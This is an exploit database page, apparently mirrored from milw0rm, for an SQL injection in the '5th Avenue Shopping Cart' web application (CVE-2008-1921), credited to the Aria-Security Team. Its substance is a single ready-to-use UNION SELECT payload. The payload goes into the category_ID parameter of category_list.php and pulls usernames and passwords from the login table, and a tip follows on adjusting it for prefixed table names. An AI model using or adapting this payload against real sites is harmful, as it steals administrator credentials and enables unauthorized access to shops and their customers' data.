5th Avenue Shopping Cart - 'category_id' SQL Injection
| EKU-ID: 13405 | CVE: OSVDB-44534;CVE-2008-1921 | OSVDB-ID: |
| Author: Aria-Security Team | Published: 2008-04-18 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 13405 | CVE: OSVDB-44534;CVE-2008-1921 | OSVDB-ID: |
| Author: Aria-Security Team | Published: 2008-04-18 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
Aria-Security Team (Persian Security Team) http://Aria-Security.Net (Persian) http://Aria-Security.com (ENG) -------------------------------------------- 5th avenue Shopping Cart SQL Injection Greetz: AurA, Kinglet, NULL category_list.php?category_ID=-1/**/UNION/**/SELECT/**/1,username,password,4,5,6,7,8,9,10,11,12,13,14,15/**/FROM/**/login/* note: if error says :table login does not exist the website is using a prefix for tables. Regards, The-0utl4w # milw0rm.com [2008-04-18]